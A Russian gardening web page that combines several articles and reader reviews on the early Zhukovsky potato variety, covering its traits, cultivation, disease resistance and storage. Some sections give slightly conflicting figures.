4 просмотров
Рейтинг статьи
1 звезда 2 звезды 3 звезды 4 звезды 5 звезд
Загрузка...

Картофель жуковский ранний описание сорта фото отзывы

Описание сорта картофеля Жуковский ранний – плюсы и минусы, фото

Дачники, самостоятельно возделывающие картофель, выбирают для посадки сорта с разным сроком созревания. Благодаря этому огородники обеспечивают себя свежими клубнями на весь тёплый сезон года. Чтобы свежий картофель появился, как можно раньше, нужно для посадки выбрать скороспелый сорт. Таким является сорт картофеля Жуковский ранний, описание, фото и отзывы о котором мы предлагаем для ознакомления.

Сорт выведен отечественными селекционерами в 1993 году. Ученые изначально ставили задачу получить картофель с ранним сроком созревания, отменным вкусом, высокой урожайностью и устойчивостью к неблагоприятным условиям произрастания. Это получилось – Жуковский стал отличным результатом работы российских селекционеров.

Описание картофеля Жуковский ранний

Растение формирует невысокие кусты полукомпактной формы с множеством ветвящихся побегов. Листья расчленённые, незначительных размеров, интенсивного зелёного окраса. Листовые пластины испещрены рельефными прожилками.

Жуковский цветёт обильно, но период цветения очень краткий. После окончания фазы цветения, не образует зелёных плодов на цветоносах. Соцветия небольшого размера, но очень плотные. Лепестки окрашены в фиолетово-розовые тона, по их краю проходит кайма белого цвета.

Вид клубней овально-округлый, с хорошими товарными качествами. По размеру клубни средние, их вес составляет 100-150 г. Покровная оболочка клубней окрашена в розовый цвет, не имеет шероховатостей. Глазки мелкого размера, красные, залегают неглубоко. Мякоть белого окраса, на вкус слегка сладкая, при варке не темнеет. Текстура плода плотная.

По оценочным характеристикам картофель Жуковский ранний имеет следующие показатели:

  • товарность клубней – 92%;
  • степень сохранности – 96%;
  • устойчивость к засухе и холоду – повышенная;
  • срок созревания – ранний (60 дней);
  • устойчивость к механическим воздействиям;
  • выход клубней с одного куста может составить 15 штук.

Достоинства и недостатки сорта

Как и любой сорт, Жуковский имеет определённые преимущества и недостатки, в сравнении с другими сортами и гибридами. Однако положительных качеств у него больше.

Достоинства

Преимущества картофеля Жуковский ранний

Характеристика Описание
Период созревания От всходов до уборки урожая проходит 55-65 дней
Урожайность Урожайность у сорта средняя – 450 ц/га, с потенциалом до 600 ц/га
Товарность клубней Из общего числа выращенных клубней 92% имеют товарный вид
Лёжкость Средняя
Содержание крахмала Клубни картофеля данного сорта содержат 1-12% крахмала
Характеристика в кулинарии В процессе варки не рассыпается или слабо рассыпается
Окраска кожуры Красивого розового цвета
Цвет мякоти клубня Чисто белый
Средний вес клубня 100-120 граммов
Число клубней в кусте Куст дает за вегетацию 10-15 клубней
Потребительские свойства Обладает хорошим вкусом, годится для запекания, варки, жарки, переработки на чипсы. Мало подходит для пюре.
Ареал возделывания Широкий. Сорт можно выращивать в любых регионах России, за исключением самых северных.
Устойчивость к болезням Сорт показывает хорошую устойчивость к:

  • раку картофеля,
  • нематоде,
  • парше.

Обладает средней устойчивостью к:

  • ризоктониозу,
  • вирусным болезням,
  • бактериозу.
Нетребовательность к условиям произрастания Сорт совершенно неприхотливый, может расти даже при неблагоприятных условиях. Хорошо откликается на рыхления, прополки, поливы, подкормки.
Пригодность к механической уборке Клубни легко выдерживают механические повреждения, для уборки можно применить механизированный вариант
Пригодность к хранению Ранние сорта, как правило, долго не хранятся. Однако Жуковский можно хранить несколько месяцев.
Отличные вкусовые качества, полезность Жуковский – универсальный сорт салатного типа. Его клубни содержат много полезных минералов, витаминов, белка, клетчатки.

Недостатки

Из минусов сорта можно отметить следующие:

  • загнивание клубней, если их собрали не вовремя;
  • вкусовые качества на уровне средних показателей;
  • малая устойчивость к фитофторозу.

Посадка Жуковского

Ранний картофель сорта Жуковский рекомендуется размещать на освещённых солнцем участках. Лучше, если участок будет иметь небольшой уклон, чтобы не могло произойти подтопление кустов. Культуру с одинаковым успехом возделывают на любых типах почв.

Более предпочтительны следующие почвы:

  • плодородные лёгкие грунты,
  • супесчаные,
  • суглинистые по механическому составу.

Только такая почва способна длительное время иметь рыхлую структуру, не препятствующую проникновению кислорода к корневой системе.

Подготовка почвы

Готовить участок под картофель нужно начинать с осени. После уборки предшественника, почву требуется перекопать на 20 см в глубину, не разбивая комьев. Для улучшения плодородия, рекомендуется внести на участок перепревший навоз, из расчёта 5 кг на м².

С наступлением весны, участок снова перекапывают, с разбивкой земляных комьев, выравниванием поверхности граблями. Весеннюю процедуру достаточно выполнить на глубину 15 см. Для стимулирования быстрого стартового роста кустов желательно внести азотосодержащие удобрения.

Лучшими предшественниками для картофеля считаются:

  • свёкла;
  • капуста;
  • морковь;
  • огурцы.

Важно! Крайне не рекомендуется размещать картофель после помидоров или перца. Эти культуры, как и картофель, относятся к семейству Паслёновых, имеют одинаковых вредителей и возбудителей болезней.

Бытует мнение, что картофель легко выдерживает монокультуру. Однако лучше не выращивать картофель более 2 лет подряд на одном участке.

Подготовка посадочного материала

Перед посадкой предполагается готовить посадочный материал. Подготовка включает несколько этапов:

  1. Переборка клубней. Отбраковывают повреждённые, мягкие, мелкие клубнеплоды. Не рекомендуется разрезать клубни для увеличения семенного материала.
  2. Проращивание. Отобранные для посадки семенные клубни, начинают проращивать. Их следует разместить в ящиках или насыпью в помещении с рассеянным освещением, где поддерживается температура от +5 до +20 градусов. Период проращивания зависит от температуры воздуха, может длиться 2-3 недели. Процедуру считают завершённой, когда из глазков появятся отростки длиною 1 см.
  3. Обеззараживание семенных клубней. Применяют покупные фунгициды и инсектициды, которые уничтожают возбудителей болезней, вредителей. Часто используют препарат «Максим».

Внимание! При посадке нужно все действия выполнять вручную, чтобы не обломить ростки.

Время и схема посадки

Картофель Жуковский на участках открытого грунта размещают на стыке апреля-мая. Сроки могут сдвигаться в зависимости от региона возделывания культуры. Почва должна быть ещё достаточно влажной, но не налипать на лопату.

Поскольку сорт относится к ранним, идеально подойдёт следующая схема посадки:

  • интервал между клубнями в ряду – 30 см;
  • ширина междурядий – 60 см;
  • глубина заделывания – 10-12 см.

Совет. Чтобы ряды получились ровными, можно использовать шнур.

Возделывание этого сорта картофеля не отличается повышенной сложностью. Для получения хорошего результата достаточно выполнять описанные ниже агроприёмы.

  1. Окучивание кустов. В процессе вегетации картофель этого сорта окучивают 2 раза. Первый раз к процедуре приступают, когда высота растений достигнет 12-15 см. После окучивания, над поверхностью земли должны торчать ростки высотой 5 см. Второй раз операцию проводят спустя 3 недели, после первого окучивания. Если почва в этот момент сухая, её перед окучиванием поливают.
  2. Полив. Картофель этого сорта засухоустойчивый, это не означает, что он может обойтись без орошения. До всходов и 2-3 недели после всходов картофель поливать не обязательно, если его посадили во влажную почву и периодически идут дожди. Первый раз полив проводят, спустя 3 недели после всходов. Второй полив надо запланировать на период бутонизации картофеля. Каждый раз выливают по 4 л воды под куст.
  3. Уничтожение сорняков. После осадков или полива нужно каждый раз проводить рыхление почвы в междурядьях. Рыхление является хорошей профилактикой от таких болезней, как фитофтороз, фузариоз, бактериальные гнили. Параллельно с рыхлением почвы, удаляют сорняки, поскольку они затеняют кусты картофеля, мешая нормальному росту.
  4. Подкормки. К подкормкам ранних сортов приступают раньше других сортов. Вносят удобрения в течение вегетации в несколько этапов:
    • при весенней подготовке участка, вносят азотные туки;
    • в фазу цветения выливают под каждый куст 1,5 л калийных удобрений (30 г сульфата калия на 10 л воды);
    • спустя 2 недели после второй процедуры, можно провести подкормку куриным помётом (развести помёт с водой в пропорции 1:15 и выливать 1 л жидкости под куст).

Важно! Когда кусты картофеля начали засыхать, подкормки не дадут положительного эффекта.

  1. Болезни и вредители. Картофельным кустам могут нанести урон медведка, колорадский жук. С вредителями следует вести борьбу, раскладывая отравленные приманки, опрыскивая насаждения инсектицидами против жука. Для профилактики от фитофтороза проводят опрыскивания плантаций одним из следующих препаратов:
    • Бордоская жидкость;
    • Фитоспорин-М;
    • Медный купорос.

Хранение урожая

Через 2 месяца со дня появления всходов, Жуковский готов к уборке урожая. На стыке июля и августа рекомендуется удалить ботву, поскольку клубни уже сформировались. Эта процедура направлена против фитофтороза.

Уборку можно вести ручным и механическим способом. Собранные клубни рекомендуется хранить в тёмном помещении, где постоянно поддерживается температура в диапазоне от +2 до +5 градусов. Для длительного хранения этот сорт не предназначен.

Картофель Жуковский годится для выращивания в небольших приусадебных хозяйствах и в больших производственных масштабах. Клубни выдерживают механические воздействия, поэтому убирать его можно механизированным вариантом.

Подкупает также устойчивость к большинству распространённых болезней культуры. Хороший урожай можно вырастить в любом регионе, на любых почвах, нужно лишь придерживаться рекомендаций, изложенных в этой статье.

Отзывы

Отзывы о сорте присылайте пожалуйста в комментариях к статье. Они будут опубликованы на сайте после проверки.

Сажаю Жуковский 3 года, всегда 15 мая. Клубни крупные, только трескаются иногда, но и остальные сорта трескаются, когда в июне дожди заряжают. На вкус всем понравилась, разваристая.

Выращиваю стандартно. При посадке навоз перепревший, золу и яичную скорлупу закапываю. За сезон – 1 окучивание, 2 рыхления, жука прыскаем, прополочка. В середине августа оставшуюся ботву срезаю. Получается 90 дней вегетации. Из минусов – плохая устойчивость к фитофторе, покосила ботву. Из плюсов – ранняя, на еду ее копаем и вкусная. Но не для основного урожая.

Игорь Васильевич, Подмосковье

Много лет сажу Жуковский – нравится! Самый ранний у меня, первым на продажу идет, когда цены хорошие. Клубни крупные – 4-5 штук – кило.

Один раз сжал этот сорт. Ранний, конечно, это большой плюс. Но невкусный. Хотя если сравнивать с ранними сортами, что продаются, так гораздо вкуснее, а с поздними не конкурирует, хотя жене нравится. И потрескалось много клубней, правда дождей было много. Садили на майские, полностью созревает в начале августа.

Выращиваю Жуковский в поле на продажу. Очень ранний! Сажаем 15 апреля, продаю уже 20 июня. Урожайность средняя, но все равно очень выгодно. И сами едим. Первый урожай немного водянистый, потом набирает крахмалов, разваривается.

Александр из Тамбовской области

Картофель Жуковский: ранняя пташка!

«Картошка да каша – еда наша», — говорили на Руси. Времена другие, а предпочтения остаются прежними. Картофель и сейчас — одно из главных блюд в праздники и будни. Жаркое в горшочках и хрустящее фри, драники и вареники, рагу и запеканки, вкусные и полезные. В картофеле содержится такое количество жизненно важных минералов и витаминов, что овощную культуру можно с полным правом называть аптечкой с грядки.

Вот почему важно иметь на участке сорта, созревающие в разгар лета, когда организм все еще остро нуждается в полезных веществах. Ранний картофель Жуковский готов прийти на помощь. Его любят и агрономы, и огородники, и потребители. Первые – за сроки созревания, корнеплоды можно употреблять в пищу уже в конце июля. Вторые – за неприхотливость. Третьи – за вкусовые качества.

Описание сорта картофеля Жуковский

Ранний сорт картофеля российские селекционеры вывели в конце прошлого века путем скрещивания двух видов под названием «Ягодка» и «Гидра». Предполагалось, что выращивать его будут на территориях с умеренным климатом, однако быстро удалось выяснить, что низкие температуры растению не страшны. Как не пугают его засуха и многие специфические болезни. Огородники взяли это на заметку. Теперь картофель Жуковский выращивают практически повсеместно.

Как выглядит этот сорт? Внешняя декоративная привлекательность среднерослого растения с раскидистыми кустами, зелеными глянцевыми листочками и большим количеством красивых белых соцветий в период вегетации, дают основание предположить, что именно такие особи привлекли внимание во времена, когда корнеплоды разводили не как съедобную культуру, а для услады души. В наше время картофель Жуковский услаждает своих хозяев качеством и количеством: один куст при надлежащем уходе дарит от 10 до 12 клубней овальной формы розового цвета с яркими глазками и гладкой тонкой кожурой, каждый из которых весит 100-150 г.

Характеристики

Серьезным плюсом раннего сорта является устойчивость к механическим повреждениям, позволяющая собирать урожай как вручную, так и с использованием механических и автоматических средств. Утверждение, что сорт неприхотлив, не подлежит сомнению, это действительно так. Однако было бы наивно предположить, что о клубнях после посадки можно забыть, бросив их на произвол судьбы.

Пожалуй, только сорняки не нуждаются в уходе. О чем нужно помнить огородникам? Вспомните присказку о том, что в хорошей почве даже веники цветут. От истощенного, кислого грунта достойного урожая ждать не придется. Для сорта Жуковский не важно – суглинок это или супесчаная земля. Пасленовые не любят, когда их высаживают несколько лет подряд в одном и том же месте. Периодически меняйте дислокацию. Выбирая место для посадки, вспомните о том, что растение любит солнечные места. По кулинарным показателям ранний сорт картофеля причисляют к категориям А/В – салатный, универсальный. Хорош в жаренном и запеченном виде, а вот для приготовления пюре не годится.

Ранний сорт картофеля Жуковский ценят за следующие свойства:

  • отличный слегка сладковатый вкус;
  • возможность использования в стадии развития;
  • белую мякоть;
  • невысокую калорийность;
  • плотную текстуру;
  • способность сохранять цвет и форму в процессе варки;
  • большое количество калия, магния, фосфора, кальция;
  • низкое содержание крахмала -10-12%;
  • длительный срок хранения.

Преимущества и недостатки

У каждого сорта есть свои плюсы и минусы – сверхранний картофель Жуковский не является исключением. В числе преимуществ специалисты и практики называют короткий период созревания – через 2 месяца после посадки можно собирать урожай. Не боится морозов и жары, его выращивают на юге, в Сибири и даже более холодных регионах России. Устойчивость к низким температурам позволяет сажать этот сорт в ранние сроки, с наступлением первых теплых дней.

Собрав все лучшие черты от своих «родителей», ранний сорт Жуковский отличается стойким иммунитетом по отношению к ряду привычных в среде растений заболеваний. Поскольку формирование плодов растянуто по сроку, их можно потихоньку выкапывать в период всего созревания. Во время роста боковые побеги картофеля расползаются в разные стороны. Заметив это, опытные огородники стали использовать при посадке солому. Эта технология позволяет выкапывать картофель частями, не трогая весь куст. Один семенной плод по истечении двух месяцев позволяет получить до 4-5 кг. Один гектар дает 10-12 тонн отличного картофеля. При окончательной копке цифры могут увеличиться почти в четыре раза! Важным является и то, что 92% урожая картофеля Жуковский имеют товарный вид.

Недостатков у растения гораздо меньше, чем достоинств. К недостаткам огородники относят необходимость в поливе. Несмотря на устойчивость к засухе, картофель нуждается в воде. В засушливое время требуется около 5 литров жидкости на один погонный метр грядки. Ранний сорт все же необходимо защищать от заморозков. В случае прихода сильных холодов, что иногда у нас случается, грядки с неокрепшими растениями следует накрывать специальной пленкой или агроволокном. Хозяевам участков следует помнить: картофель Жуковский нужно убирать вовремя. Передержали в земле? Клубни потеряют вкус.

Болезни и вредители

У картофеля Жуковский отсутствуют защитные силы против ряда болезней. Сорт восприимчив к фитофторозу или картофельной гнили. Фитофтороз особенно опасен при высокой влажности и не очень теплой погоде. Чтобы вовремя определить, не болеют ли ваши зеленые питомцы, чаще подходите к грядкам и осматривайте кустики. Этот сорт картофеля любят колорадские жуки и медведки. Картофель Жуковский устойчив к ряду недугов, в их числе:

  • картофельный рак, который легко определить по темным наростам, напоминающим цветную капусту;
  • картофельная нематода (черви-паразиты), затрагивающая корневую систему растений;
  • ризоктониоз – черная парша, вызванная грибом Rhizoctonia solani и поражающая все части растения;
  • альтернариоз – причиной является одноименный гриб, а признаками — коричневые и темно-бурые пятна на листиках.

Отзывы

«Выращиванием картофеля Жуковский занимаюсь 20 лет. Многому училась у родителей. Главная заповедь для хозяина: не лениться. Хочешь получить хороший урожай, поклонись грядкам. Ты для них самый важный человек. Раннеспелый сорт картофеля Жуковский – один из любимых в нашей семье. Но, несмотря на кажущуюся неприхотливость, руки человека он любит. Окучивать его придется несколько раз за лето. Первый раз, и это очень важно, в период цветения. Потом уже по мере необходимости, сами поймете, когда это нужно. Окучивание спасет картофельные кусты от разваливания. Зато, каков урожай! Молодую картошечку любит вся семья», — Иван Гуськов, г. Тольятти.

«Картофель Жуковский – один из наших любимых сортов. Выращиваем этот сорт давно, знаем все его причуды, понимаем, что ему нужно. Чтобы получить хороший урожай, надо готовить картофель к посадке. Обязательно проведите дезинфекцию слабым раствором марганцовки. Вскопайте землю за неделю до посадки и сажайте. Некоторые дачники ругают этот сорт картофеля за вкус, а нам он нравится. Пюре из него получается не очень вкусное, а вот для жарки в самый раз. Летом, когда выезжаем на дачу, запекаем в костре», — Мария, г. Краснодар.

«Кое-кто ругает картофель Жуковский, а зря. Не получился хороший урожай, предъявляйте претензии к себе. Хочу поделиться советом, который поможет вырастить хорошие клубни. В лунки для картофеля насыпьте измельченную яичную скорлупу с древесной золой. Это будет хорошей поддержкой будущим растениям», — Ирина Новикова, г. Саратов.

Видео по теме

Сорт картофеля Жуковский

Одним из наиболее популярных и распространенных в мире овощей является картофель. Среди разнообразных сортов этой культуры выделяется картофель Жуковский. Это ранний вид с высокой урожайностью, стойким иммунитетом ко многим заболеваниям и прекрасными вкусовыми качествами.

Описание сорта картофеля Жуковский

Описание картофеля Жуковский

Картофель Жуковский был получен в конце XX века посредством скрещивания двух сортов. В результате эксперимента удалось получить стойкий, устойчивый к засухе сорт с сильным иммунитетом. Жуковский выращивается по большей части в регионах с умеренным климатом. Хотя отличные результаты выращивания были получены во всех уголках России, включая Сибирь и южные области.

Сорт ранний, приносит первый урожай уже через 60 дней после посадки. Кустики полураскидистые, средней высоты. Листочки темно-зеленые. Цветение обильное, но не долгое. Бутоны белые по краям и красноватые в серединке. Урожайность достигает 3,5 кг/м. кв. В среднем под каждым кустиком образуется по 10-12 здоровых картофелин.

Клубни среднего размера, овальные, массой 100-150 грамм. Окрас кожуры бежевый или розоватый с яркими глазками. Мякоть белого цвета, плотная, не темнеет на срезах. В составе 10-14,7 % крахмала. При варке не разваривается.

Достоинства и недостатки картофеля Жуковский

Перед тем как перейти к особенностям посадки и ухода за культурой, стоит рассмотреть достоинства и недостатки сорта. Итак, какие сильные стороны картофеля Жуковского?

  • Имеет короткий срок созревания, всего 2 месяца.
  • Хорошо переносит засуху.
  • Не боится морозов, поэтому может выращиваться даже в холодных областях.
  • Картофель Жуковский имеет стойкий иммунитет к таким заболеваниям как: парша, рак картофеля, а также к воздействию нематоды.
  • Неприхотлив к уходу.
  • После сбора урожай долго хранится.

Недостатков не много, но забывать о них не стоит.

  • Нуждается в своевременной уборке, так как при передержке в земле портится вкус клубней.
  • При высокой влажности и относительно теплой погоде поражается фитофторозом.

Посадка картофеля Жуковский

Картофель Жуковский посадка

Одним из достоинств сорта является то, что он может выращиваться на любом типе почвы, главное, чтобы она не была кислой. Но вот место под посадку лучше выбирать солнечное, это важно для быстрого развития растения. Подготовку земли лучше начинать с осени. Ее перекапывают, разрыхляют, снижают кислотность если нужно. Именно в это время после перекопки земли ее удобряют навозом (компостом), чтобы за зиму он успел перепреть и был отличным питанием для культуры.

Так как картофель Жуковский без проблем переносит холодную температуру, сажать его можно уже в середине весны. Но перед этим важно прорастить клубни. Делается это с середины марта. Картофель осматривается, перебирается, сортируется по размеру и раскладывается на полу так, чтобы на него попадал рассеянный солнечный свет. Примерно через 15-30 дней появятся хорошие ростки, и картофель будет пригоден к посадке. Тип посадки подбирается в зависимости от участка и предпочтений огородника. Это может быть траншейный, плоский или гребневой метод.

Перед посадкой, в подготовленные лунки можно засыпать немного измельченной яичной скорлупы с древесной золой или какие-нибудь минеральные, азотные смеси. Оптимальная температура для посадки +5 градусов. Глубина заделки клубней около 5 см. Расстояние между клубнями 30 см, а между рядами 70 см.

Уход за посадками

Уход за кустами картофеля

Картофель Жуковский не требует к себе особенного ухода, трепетного обращения с кустиками или молодыми ростками. Уход за ним мало чем отличается от ухода за другими сортами.

  • Окучивание проводится по мере роста кустика. Начинают его делать, когда ростки достигают высоты 5 см. Эта процедура защищает кустик от холодов, вредителей, болезней, а также стимулирует развитие мощной корневой системы.
  • Поливы необходимы своевременные, обильные, но не частые. Много влаги может навредить и привести к развитию фитофтороза. А вот засуху это растение переносит без проблем. Так что в данном случае лучше недолить, чем перелить.
  • Борьба с водителями и болезнями обычно приходится на летний период. При появлении колорадского жука, фитофтороза или любых иных проблем, стоит немедленно использовать инсектициды (фунгициды) или сильные народные средства.
  • Прополка проводится не только на первых этапах развития культуры, но и когда кустики значительно подрастут. Ведь корнеплоды должны развиваться в рыхлой, насыщенной кислородом, питательной среде.
  • Любые сорняки удаляют по мере их появления. Их вред в поглощении питательных веществ и влаги в почвы, распространении вредителей, болезней, а также деформации клубней картофеля своими корнями.

Сбор и хранение урожая

Сбор и хранение картофеля Жуковский

Через 60 суток после посадки картофеля можно начать собирать урожай. И надолго откладывать эту процедуру не стоит, так как это может негативно отразится на вкусовых качествах корнеплодов. К механическим повреждениям сорт устойчив, поэтому собирать клубни можно как самостоятельно, вручную, так и при помощи специальных машин, автоматических инструментов.

После выкапывания картофель хорошо просушивается и складывается на хранение в мешки или ящики. Помещение для хранения должно быть чистым, сухим с температурой +2…+5 градусов. Лежит картофель долго, без потери вкусовых или внешних качеств, поэтому его нередко выращивают на продажу.

Отзывы о картофеле Жуковский

Как правило, огородники положительно отзываются о сорте Жуковский, ведь он действительно выгоден в выращивании, как в малых, так и в больших масштабах.

Екатерина Карасева: «Из ранних сортов картофеля предпочитаю сорт Жуковский. Он быстро созревает, дает большой урожай, и проблем с ним никаких нет – главное дождаться пока созреет. Так как однажды собрала раньше срока, и он очень плохо хранился».

Петр Савченко: «Не первый год сажаю картофель Жуковский, но только вместе с другими сортами. Он неприхотлив и быстро дает урожай. Всегда идет на еду первым. А поздние сорта пускаю на хранение. Главная проблема, с которой столкнулся – колорадский жук, но если правильно подобрать инсектицид, то трудностей не будет».

Олеся Петрова: «Несмотря на холодный климат и относительно прохладное лето в этом году, сорт картофеля Жуковский порадовал большим урожаем. Правда на уход потратила немало времени, но оно того стоило. Теперь буду сажать ежегодно. Он очень вкусный и долго лежит, поэтому советую всем».

Картофель Жуковский: описание сорта, фото, отзывы

Характеристика и отзывы о сорте картофеля ранний Жуковский многозначительные, положительные, но обязательно следует знать сроки посадки и уборки урожая. Данные факторы напрямую влияют на вкусовые показатели овоща.

В 1993 году Жуковский ранний был внесен в Госреестр РФ. Разновидность считается лучшим результатом российской селекции. Оригинатор – ФГБНУ «ВНИИ картофельного хозяйства им. А. Г. Лорха».

Описание сорта Жуковский

Куст полукомпактный, средней высоты, с многочисленными сильноветвящимися побегами. Листва мелкая, насыщенно-зеленого цвета, расчлененная. На поверхности листовой пластины проглядываются рельефные прожилки. Цветение массовое, но кратковременное. По окончании плоды на цветоносах не образуются. Соцветия плотные, небольшие. Окрас лепестков фиолетово-розовый с белой каймой по краю.

Клубни правильной овально-округлой формы. Имеют товарный вид. Размер средне-крупный, масса 100-150 г. Кожура гладкая, розовая. Глазки мелкие, неглубокие, красного цвета. Мякоть белая, сладковатая на вкус, не темнеет при термической обработке. Картофель отличается плотной текстурой.

Оценочные характеристики раннего картофеля Жуковский:

  • товарность – 92%;
  • сохранность – 96%;
  • повышенная засухо- и холодоустойчивость;
  • срок созревания от момента посадки до сбора урожая составляет 60 дней;
  • устойчивость к механическим повреждениям;
  • стабильная высокая урожайность, до 15 клубней в кусте.

Вкусовые качества

Картофель Жуковский по кулинарным показателям относят к категориям А/В (салатный, универсальный). Клубни считаются полноценными источниками магния, калия, кальция, фосфора. Содержание крахмала составляет 12%. Наиболее вкусен картофель Жуковский в жаренном или запеченном виде. Пюре из этого сорта лучше не делать, по отзывам картофель Жуковский ранний хорош в отварном виде, особенно на стадии пучковой зрелости, то есть молодой. Калорий содержит мало.

Плюсы и минусы

При выборе сорта картофеля для своего огорода необходимо определиться с его слабыми и сильными сторонами. Для Жуковского раннего достоинствами являются:

  • растянутое плодоношение;
  • стабильная урожайность;
  • ранние сроки вызревания плодов;
  • длительный период хранения;
  • устойчивость к парше, картофельному раку, нематоде;
  • отличные товарные качества;
  • засухоустойчивость.

Что касается недостатков необходимо выделить: загнивание плодов, связанное с несвоевременным сбором урожая, средние вкусовые показатели, плохое противостояние фитофторозу.

Посадка и уход за семенным картофелем Жуковский

Ранний картофель Жуковского предпочтительно высаживать на солнечных участках. Они должны быть пологими, что исключит возможность даже кратковременного подтопления. К составу грунта особых требований не предъявляет. Однако лучше будет расти в легких, плодородных, супесчаных или суглинистых почвах. Ведь данный грунт способен на протяжении длительного времени сохранять рыхлую структуру, не препятствовать доступу кислорода к корням.

Выбор и подготовка посадочного участка

Место на огороде под картофель Жуковский перекапывают 2 раза в год – осенью и весной.

Процедура, проделываемая в холодное время, подразумевает избавление от возможных инфекционных возбудителей, зимующих в почве. В процессе грубые комья разбивать не нужно, пусть промерзают. Для повышения плодородности почвы добавляют навоз. Его разбрасывают по территории, норма внесения 5 кг на 1 кв. м. Это способствует появлению полезной микрофлоры на грядке.

Весенняя процедура более поверхностна. Перекопку выполняют, когда поверхностный слой подсохнет, разбивают земляные глыбы, комки, делая грядку ровной. Максимальная глубина вскапывания –15 см. В процессе убирают корни сорняков, личинки вредителей. Тогда же можно рассыпать на поверхность грунта азотные удобрения.

Чтобы получать постоянные и обильные урожаи картофеля Жуковский, необходимо придерживаться правильного севооборота. Оптимально проводить высадку культуры после моркови, свеклы, огурцов, капусты. Не советуют высаживать картофель Жуковский после баклажан, томатов, перца. Поскольку они имеют общие заболевания и вредителей.

Кроме того, опытными огородниками не рекомендуется размещать картофель Жуковский больше двух лет на одной территории, почве необходим отдых.

Подготовка посадочного материала

От качества семенного картофеля ранний Жуковский напрямую зависит урожайность культуры. Для посадки следует выбирать здоровые, продолговатые клубни массой 100–150 г.

Как правило, пророщенный картофель появляется на 10–14 дней раньше. Поэтому подготавливать посадочный материал нужно за месяц до посадки.

  1. Проводят обработку от болезней и вредителей препаратом Максим.
  2. Переносят картофель Жуковский в помещение с температурой + 10-13 °С.
  3. Раскладывают корнеплоды на стеллажах или в ящиках одним слоем.
  4. Постоянно проводят осмотр, загнившие экземпляры удаляют.
  5. Картофель готов к посадке, если ростки достигли 1 см и более.
  6. Чтобы сократить время прорастания можно посадить плоды в торфяную смесь с периодическим обрызгиванием водой.

Чтобы повысить всхожесть и обеспечить иммунитет, картофель Жуковский следует выдержать 7-10 дней на ярком свете, пока не позеленеет кожура. Высаживать пророщенный корнеплод необходимо вручную, чтобы не обломать ростки.

Правила посадки

Картофель Жуковский ранний высаживают в открытый грунт в конце апреля или в начале мая в зависимости от региона. Почва должна быть еще влажной, чтобы на штык лопаты легко склеивалась в ком, а не рассыпалась.

Для этого сорта подходит стандартная схема посадки – расстояние между клубнями 25-30 см, а междурядья 60 см. Глубина 10 см, если в составе грунта много глины, ее лучше уменьшить. Высаживать ровными рядами, можно под шнур. Таким образом, за культурой будет легче ухаживать в дальнейшем.

Полив и подкормка

Поливать картофель Жуковский во время роста не нужно, если он посажен во влажную землю, и регулярно идут дожди. Однако состояние почвы необходимо держать под контролем. В жаркую погоду удержать влагу в междурядьях поможет слой мульчи.

Как правило, поливают картофель сорта Жуковский рано утром или вечером. Во время активного солнца процедуру лучше не выполнять. Первую процедуру проводят, после появления всходов. Объем жидкости – 2-2,5 л под куст. При недостатке влаги в этот период развивается большое количество столонов, а число клубней сокращается.

Вторая необходимая процедура проводится во время бутонизации и цветения картофеля Жуковский ранний. Под куст достаточно будет влить 4 л воды. Если этого не сделать, и растение будет испытывать недостаток воды – клубни будут мелкими.

Ранние сорта нужно подкармливать несколько раньше, нежели остальные.

  1. Азотосодержащие вещества добавляют весной, во время подготовительных земляных работ или непосредственно в посадочную яму.
  2. Во время цветению картофель Жуковский нуждается в калии. На 10 л воды потребуется спичечная коробка сернокислого калия. Минеральные подкормки вносят после полива или дождя. Под куст следует влить 1,5 л полезной жидкости.
  3. Самые эффективные удобрения для картофеля Жуковский – органика, в частности, птичий помет. В чистом виде его использовать нельзя. Поэтому органическое удобрение разводят с водой в пропорции 1:15 соответственно. Для одного растения достаточно будет 1 л. Такая подкормка может защитить кусты от грибковых инфекций, поскольку после внесения развиваются в грунте полезные микроорганизмы.
  4. После усыхания ботвы подкармливать уже бесполезно.

Рыхление и прополка

Процедуру рыхления грунта проводят после дождя или полива. Затяжной весной, когда долго нет всходов, рыхление ускоряют появление всходов. Положительно влияет процесс на развитие клубней. В профилактических целях рыхление помогает избежать фузариозных или бактериальных гнилей, фитофтороза. Важно помнить, что глубина рыхления должна составлять 3-5 см.

Обязательным правилом также является регулярное удаление сорняков с грядки с картофелем Жуковского. Поскольку они препятствуют росту клубней. К тому же сорняки являются переносчиками опасных заболеваний.

Окучивание

В течение всего периода вегетации процедуру проводят дважды. В первый раз, когда ростки картофеля Жуковский будут виднеться на 10-15 см от поверхности земли. Особенно важно значение имеет окучивание для территорий, где возможны возвратные заморозки. Нагребать землю следует так, чтобы растения оставались высотой 5 см. Повторную процедуру стоит выполнять спустя 2-3 недели, если грунт влажный. Если нет, тогда стоит предварительно полить его.

Окучивание картофеля Жуковский стимулирует своевременное развитие и вызревание клубней.

Болезни и вредители

Стоит отметить, что картофель ранний Жуковский характеризуется высокой устойчивостью к типичным заболеваниям семейства Пасленовых:

  • картофельный рак;
  • нематоза;
  • альтернариоз;
  • черная парша.

Однако овощ имеет слабое сопротивление к опасному грибковому заболеванию фитофторозу, именуемой еще картофельной гнилью. Для профилактики и в борьбе с этим недугом может справиться препарат Фитоспорин-М, бордоская жидкость, медный купорос. Перед посадкой важно перебирать корнеплоды, отделяя здоровые от зараженных. Подобная процедура позволит уменьшить риск возникновения фитофтороза. Также проблемы можно избежать, если за неделю до сбора урожая обрезать ботву.

Как правило, посадкам картофеля угрожает колорадский жук и медведка. Борьба с вредителем традиционная, заключается в ручном сборе жука или обработке кустов инсектицидами. Спасаясь от медведки, рыхлят почву, а по краям грядки высаживают календулу.

Урожайность картофеля Жуковский

При посадке картофеля Жуковского в начале мае первые плоды получают в конце июня. Основной урожай собирают не раньше середины августа. Перенесение сроков негативно отразится на вкусовых качествах корнеплода, а также может стать причиной загнивания плодов за счет избыточной влажности среды. Количество клубней товарного вида в гнезде составляет в среднем 10-15 штук.

Картофель сорта Жуковский имеет свою особенность: клубнеобразование происходит на протяжении всего периода вегетации. Поэтому кусты выкапывать полностью не стоит, а лишь собирая с них по несколько клубней. Такой метод подойдет для рыхлых грунтов.

Хранение

Описание сорта картофеля Жуковский ранний и отзывы опытных огородников совпадают в одном – после сбора клубни обязательно должны обсохнуть. Минимальный срок – 4 часа. После корнеплод тщательно сортируют и раскладывают по ящикам.

Рекомендуется для длительного хранения выбирать темные, сухие, хорошо вентилируемые помещения. Температурные параметры в первые 14 дней должны быть в пределах + 16-17 °С. После постоянные показатели установить на уровне + 2-5 °С и влажностью воздуха 80%.

